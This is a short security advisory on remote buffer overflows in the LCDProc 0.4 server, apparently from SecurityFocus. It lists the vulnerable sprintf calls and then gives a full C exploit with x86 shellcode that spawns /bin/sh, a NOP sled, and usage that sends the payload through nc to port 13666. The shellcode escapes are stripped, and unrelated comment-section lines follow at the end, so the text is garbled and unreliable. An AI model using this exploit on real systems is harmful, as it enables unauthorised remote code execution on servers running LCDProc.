source: http://www.securityfocus.com/bid/1131/info
A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, overflows exist at:
parse.c:149: sprintf(errmsg, "huh? Invalid command "%s"n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %sn", old_s->id);
screenlist.c:134: sprintf(str, "listen %sn", s->id);
It is possible to exploit this conditions to execute code with the privileges of the user LCDProc is running as.
/*****
* lcdproc-exploit.c
*****
*
* LCDproc 0.4-pre9 exploit
#
# Andrew Hobgood <[email protected]>
* Kha0S on #LinuxOS/EFnet
*
* Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
* on for testing).
*
*****
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFFERSIZE 269
#define NOP 0x90
#define OFFSET 0xbffff750
char shellcode[] =
"xebx1fx5ex89x76x08x31xc0x88x46x07x89"
"x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c"
"xcdx80x31xdbx89xd8x40xcdx80xe8xdcxff"
"xffxff/bin/sh";
int main(int argc, char **argv) {
char *ptr, buffer[BUFFERSIZE];
unsigned long *long_ptr, offset = OFFSET;
int aux;
fprintf(stderr, "LCDproc exploit by Andrew Hobgood <[email protected]>nn");
fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666nn", argv[0]);
if (argc == 2) offset += atol(argv[1]);
ptr = buffer;
memset(ptr, 0, sizeof(buffer));
memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
ptr += sizeof(buffer) - strlen(shellcode) - 16;
memcpy(ptr, shellcode, strlen(shellcode));
ptr += strlen(shellcode);
long_ptr = (unsigned long *) ptr;
for(aux=0; aux<4; aux++) *(long_ptr++) = offset;
ptr = (char *) long_ptr;
*ptr = ' ';
fprintf(stderr, "Buffer size: %dn", (int) strlen(buffer));
fprintf(stderr, "Offset: 0x%lxnn", offset);
printf("hellon");
fflush(stdout);
sleep(1);
printf("screen_add {%s}n", buffer);
fflush(stdout);
return(0);
}
/*** end lcdproc-exploit.c ***/
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666